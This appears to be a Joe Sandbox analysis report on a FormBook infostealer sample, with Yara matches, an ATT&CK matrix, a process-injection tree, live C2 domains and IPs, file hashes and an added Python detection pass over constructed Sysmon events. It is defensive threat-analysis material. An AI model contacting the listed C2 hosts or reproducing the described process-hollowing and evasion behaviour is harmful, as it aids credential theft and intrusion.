            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The report's matrix lists every tactic column with its techniques; the techniques the sandbox signatures actually matched carry bracketed digits, which are the report's signature-count badges as they survived extraction.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Shared Modules [1]; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection [612]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [31]; Process Injection [612]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [4]; Software Packing [3]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery [221]; Process Discovery [2]; Virtualization/Sandbox Evasion [31]; Remote System Discovery [1]; System Information Discovery [112]; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [13]; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 383848. Sample: hvEop8Y70Y.exe. Start date: 08/04/2021. Architecture: WINDOWS. Score: 100.

Signatures attached to the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures. DNS/IP info attached to the start node: www.adamspartnership.com.

Process tree as drawn in the graph (each child process is indented under its parent):

hvEop8Y70Y.exe (started)
    dropped file: C:\Users\user\AppData\...\hvEop8Y70Y.exe.log, ASCII
    signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    hvEop8Y70Y.exe (started, second instance)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected)
            DNS/IP: www.cqsjny.com 198.148.114.222, local port 49732 to port 80, MULTA-ASN1US, United States; www.aa29996.com 147.255.37.207, local port 49721 to port 80, LEASEWEB-USA-LAX-11US, United States; 12 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit)
            raserver.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe (started)
                    conhost.exe (started)


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
hvEop8Y70Y.exe | 26% | Virustotal | 
hvEop8Y70Y.exe | 29% | ReversingLabs | Win32.Trojan.AgentTesla
hvEop8Y70Y.exe | 100% | Avira | HEUR/AGEN.1138557
hvEop8Y70Y.exe | 100% | Joe Sandbox ML | 

The only family label on the initial sample (ReversingLabs) says AgentTesla, while the Yara matches and the injection behaviour recorded in this report identify FormBook; vendor family labels on a packed loader are unreliable, and the unpacked-PE and memory-based verdicts should be preferred.

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

Source | Detection | Scanner | Label
4.0.hvEop8Y70Y.exe.9a0000.0.unpack | 100% | Avira | HEUR/AGEN.1138557
4.2.hvEop8Y70Y.exe.9a0000.1.unpack | 100% | Avira | HEUR/AGEN.1138557
4.2.hvEop8Y70Y.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.0.hvEop8Y70Y.exe.8b0000.0.unpack | 100% | Avira | HEUR/AGEN.1138557
0.2.hvEop8Y70Y.exe.8b0000.0.unpack | 100% | Avira | HEUR/AGEN.1138557

            Domains

Source | Detection | Scanner | Label
www.cqsjny.com | 0% | Virustotal | 
www.betbonusuk.com | 0% | Virustotal | 

            URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com2 | 0% | Avira URL Cloud | safe
http://www.sandoll.co.krndo | 0% | Avira URL Cloud | safe
http://tempuri.org/GridOneHSDataSet.xsd | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.comI | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/G#Por | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.fonts.comic | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp// | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ana | 0% | Avira URL Cloud | safe
http://www.fonts.comn | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cnd | 0% | URL Reputation | safe
http://tempuri.org/HighScoresDataSet.xsd | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.comte | 0% | Avira URL Cloud | safe
www.okitmall.com/iu4d/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/omh#?oy | 0% | Avira URL Cloud | safe
http://www.fonts.comX | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/rpor | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/6# | 0% | Avira URL Cloud | safe
http://www.fontbureau.comm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/aali | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/L#Ko | 0% | Avira URL Cloud | safe
http://www.tiro.comc | 0% | Avira URL Cloud | safe
http://www.fonts.comcj | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/Li | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/h#wo0 | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.cqsjny.com | 198.148.114.222 | true | true | | unknown
www.betbonusuk.com | 172.67.187.138 | true | true | | unknown
www.getboostphlo.com | 172.67.219.254 | true | true | | unknown
www.aa29996.com | 147.255.37.207 | true | true | | unknown
runcouver.com | 34.102.136.180 | true | false | | unknown
www.ux300e.com | 52.58.78.16 | true | true | | unknown
mvprunning.com | 34.102.136.180 | true | false | | unknown
www.adamspartnership.com | 138.197.103.178 | true | false | | unknown
www.okitmall.com | 15.165.26.252 | true | true | | unknown
yashaerotech.com | 34.102.136.180 | true | false | | unknown
www.gmopanama.com | unknown | unknown | true | | unknown
www.yashaerotech.com | unknown | unknown | true | | unknown
www.morrealeestates.com | unknown | unknown | true | | unknown
www.mvprunning.com | unknown | unknown | true | | unknown
www.runcouver.com | unknown | unknown | true | | unknown

                                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.okitmall.com/iu4d/ | true | Avira URL Cloud: safe | low

This is the only contacted URL the sandbox marks malicious, and it is reached from the injected explorer.exe (see the behavior graph). The "safe" rating it receives from Avira URL Cloud here and in the URLs table above is a reputation-engine miss, not evidence that the path is benign; the behavioural verdict should take precedence when building blocklists.
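The behavior graph records a process chain (hvEop8Y70Y.exe starting a second copy of itself, explorer.exe being injected and then starting raserver.exe, which starts cmd.exe) and the Contacted Domains table gives the resolved C2 hosts. As an added example that is not part of the Joe Sandbox report, the following Python turns those two observations into a detection pass over Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) events. The event dictionaries, their field names, the rule wording and the sample events are all constructed for the example; only the domains, IPs and process names come from the report.

```python
"""Detection pass for the process chain and C2 hosts recorded in the
Joe Sandbox report for hvEop8Y70Y.exe. Added example, not part of the report.
The event dictionaries mirror Sysmon Event ID 1 / 3 field names but are
constructed here, not real telemetry."""
from typing import Dict, List, Tuple

# Network IOCs from the report's "Contacted Domains" table: every entry with
# Malicious=true and a resolved IP address.
C2_DOMAINS: Dict[str, str] = {
    "www.cqsjny.com": "198.148.114.222",
    "www.betbonusuk.com": "172.67.187.138",
    "www.getboostphlo.com": "172.67.219.254",
    "www.aa29996.com": "147.255.37.207",
    "www.ux300e.com": "52.58.78.16",
    "www.okitmall.com": "15.165.26.252",
}
C2_IPS = set(C2_DOMAINS.values())

# Parent -> child pairs drawn in the report's behavior graph after the
# injection into explorer.exe; neither pair is normal on a workstation.
SUSPICIOUS_CHAINS = {
    ("explorer.exe", "raserver.exe"),
    ("raserver.exe", "cmd.exe"),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (Sysmon logs full paths)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_process_event(ev: Dict[str, str]) -> List[str]:
    """Reasons a process-creation event matches the report's process chain."""
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    reasons = []
    if (parent, child) in SUSPICIOUS_CHAINS:
        reasons.append(f"parent/child pair from behavior graph: {parent} -> {child}")
    # The sample starts a second copy of itself and hollows it out. A process
    # spawning its own image is a weak signal on its own (browsers do it too),
    # so it is reported but should be corroborated by the other checks.
    if parent == child:
        reasons.append(f"self-spawn of {child} (consistent with process hollowing)")
    return reasons


def check_network_event(ev: Dict[str, str]) -> List[str]:
    """Reasons a network-connection event matches the report's C2 set."""
    reasons = []
    host = ev.get("DestinationHostname", "").lower()
    ip = ev.get("DestinationIp", "")
    if host in C2_DOMAINS:
        reasons.append(f"C2 domain {host}")
    if ip in C2_IPS:
        reasons.append(f"C2 IP {ip}")
    # The report's "System process connects to network" signature: the
    # connection comes from explorer.exe because FormBook was injected into it.
    if reasons and basename(ev["Image"]) == "explorer.exe":
        reasons.append("explorer.exe talking to C2 (injected system process)")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run both checks over a list of events; returns (event index, reason)."""
    findings = []
    for idx, ev in enumerate(events):
        if ev["EventID"] == "1":
            reasons = check_process_event(ev)
        elif ev["EventID"] == "3":
            reasons = check_network_event(ev)
        else:
            reasons = []
        findings.extend((idx, r) for r in reasons)
    return findings


# Constructed events (not real telemetry), shaped after the report's graph.
EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Users\user\Desktop\hvEop8Y70Y.exe",
     "ParentImage": r"C:\Users\user\Desktop\hvEop8Y70Y.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\raserver.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\raserver.exe"},
    {"EventID": "3", "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "198.148.114.222", "DestinationPort": "80",
     "DestinationHostname": "www.cqsjny.com"},
    {"EventID": "3", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "93.184.216.34", "DestinationPort": "443",
     "DestinationHostname": "example.com"},
    {"EventID": "1", "Image": r"C:\Windows\System32\conhost.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for idx, reason in scan(EVENTS):
        print(f"event {idx}: {reason}")
```

The self-spawn check deliberately fires on its own, because on this sample it is the first observable step before the hollowed child injects into explorer.exe; in production it should be scoped to images outside Program Files and the Windows directory, or combined with the network findings, to keep browser and updater noise down.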

                                      URLs from Memory and Binaries

Memory dumps that recur as sources in this table:
  S1 = hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp
  S2 = explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp
  S3 = hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp
  S4 = hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmp
  S5 = hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp
  S6 = hvEop8Y70Y.exe, 00000000.00000003.240959056.0000000005DC4000.00000004.00000001.sdmp

Most entries are type-foundry and font-licence URLs (fontbureau, tiro, sajatypeworks, jiyu-kobo and so on) that appear in the same memory region in both the sample and the uninfected explorer.exe dump, which is what embedded font metadata looks like; variants such as designersG, tiro.com2 or sandoll.co.krndo are string-extraction run-ons rather than distinct URLs. None of them is sample infrastructure, and the C2 hosts are the ones in the Contacted Domains table above.

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | S1, S2 | false | | high
http://www.fontbureau.com/designers/? | S1, S2 | false | | high
http://www.founder.com.cn/cn/bThe | S1, S2 | false | URL Reputation: safe | unknown
http://www.tiro.com2 | hvEop8Y70Y.exe, 00000000.00000003.239195731.0000000005DDB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | S1, S2 | false | | high
http://www.sandoll.co.krndo | hvEop8Y70Y.exe, 00000000.00000003.240127889.0000000005DC9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/GridOneHSDataSet.xsd | hvEop8Y70Y.exe | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | S2 | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | S2 | false | | high
http://www.tiro.comI | hvEop8Y70Y.exe, 00000000.00000003.238931392.0000000005DDB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | S1, S2 | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/G#Por | S3 | false | Avira URL Cloud: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | S5 | false | | high
http://www.sajatypeworks.com | S4, S1, S2 | false | URL Reputation: safe | unknown
http://www.typography.netD | S1, S2 | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | S1, S2 | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | S1, S2 | false | URL Reputation: safe | unknown
http://fontfabrik.com | S1, S2 | false | URL Reputation: safe | unknown
http://www.fonts.comic | hvEop8Y70Y.exe, 00000000.00000003.238491766.0000000005DDB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp// | S3 | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ana | S3 | false | Avira URL Cloud: safe | unknown
http://www.fonts.comn | hvEop8Y70Y.exe, 00000000.00000003.238413554.0000000005DDB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | S1, S2 | false | URL Reputation: safe | unknown
http://www.fonts.com | S4, S2 | false | | high
http://www.sandoll.co.kr | S1, S2 | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | S1, S2 | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | S1, S2 | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | S5 | false | | high
http://www.sakkal.com | S1, S2 | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnd | hvEop8Y70Y.exe, 00000000.00000003.240642231.0000000005DFD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/HighScoresDataSet.xsd | hvEop8Y70Y.exe | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | S1, S2 | false | | high
http://www.fontbureau.com | S1, S2 | false | | high
http://www.sajatypeworks.comte | S4 | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/omh#?oy | S6 | false | Avira URL Cloud: safe | unknown
http://www.fonts.comX | S4 | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | S1, S2 | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | S1, S2 | false | | high
http://www.founder.com.cn/cn | S1, S2 | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | S1, S2 | false | | high
http://www.jiyu-kobo.co.jp/Y0/ | S3 | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/rpor | S3 | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/6# | S3 | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comm | hvEop8Y70Y.exe, 00000000.00000002.266638944.0000000005DC0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | S1, S3, S2 | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | S1, hvEop8Y70Y.exe, 00000000.00000003.246364868.0000000005DCD000.00000004.00000001.sdmp, S2 | false | | high
http://www.jiyu-kobo.co.jp/aali | S3 | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/L#Ko | S3 | false | Avira URL Cloud: safe | unknown
http://www.tiro.comc | hvEop8Y70Y.exe, 00000000.00000003.239146242.0000000005DDB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.comcj | S4 | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/Li | S6 | false | | 
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/h#wo0hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown

Contacted IPs

Public

IP               Domain                Country        Flag  ASN     ASN Name             Malicious
52.58.78.16      www.ux300e.com        United States  US    16509   AMAZON-02            true
147.255.37.207   www.aa29996.com       United States  US    395954  LEASEWEB-USA-LAX-11  true
15.165.26.252    www.okitmall.com      United States  US    16509   AMAZON-02            true
172.67.187.138   www.betbonusuk.com    United States  US    13335   CLOUDFLARENET        true
198.148.114.222  www.cqsjny.com        United States  US    35916   MULTA-ASN1           true
172.67.219.254   www.getboostphlo.com  United States  US    13335   CLOUDFLARENET        true
34.102.136.180   runcouver.com         United States  US    15169   GOOGLE               false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383848
Start date: 08.04.2021
Start time: 11:03:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: hvEop8Y70Y.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@12/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 17.8% (good quality ratio 15.8%)
• Quality average: 73.5%
• Quality standard deviation: 32.1%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.82.210.154, 104.42.151.234, 13.88.21.125, 23.54.113.53, 95.100.54.203, 23.10.249.43, 23.10.249.26, 23.0.174.200, 23.0.174.185, 20.54.26.129, 20.50.102.62
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time      Type             Description
11:04:04  API Interceptor  1x Sleep call for process: hvEop8Y70Y.exe modified

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hvEop8Y70Y.exe.log
Process: C:\Users\user\Desktop\hvEop8Y70Y.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.597441784655769
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:hvEop8Y70Y.exe
                                                              File size:652800
                                                              MD5:bd7e988ed1d92f9faf32f6a817d89329
                                                              SHA1:4ab28bec26ad120653ca060a4c735befded7551e
                                                              SHA256:94b77677478f890b5f9e0561aebc0f66b1b2fc4494d016e9b5a70ed0ba20980b
                                                              SHA512:735f20cac5d89fd1b9a0a5e23616d7779ec1dcf8d1c03a4358fcac6bd5f769653365b124ed5340e4f63ca3b3de400f05218b0a86eb91351a76e6bb00aa169995
                                                              SSDEEP:12288:lUpaVU/kLEPkVBOSHE4nYE6QHICiqE4K+IUN2qp0ukF/kKm:lUpaCkWkVBOSki6UICDyMgqauil
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~n`..............P.................. ... ....@.. .......................`............@................................

                                                              File Icon

                                                              Icon Hash:00828e8e8686b000

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x4a05f2
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0x606E7EFA [Thu Apr 8 03:56:42 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

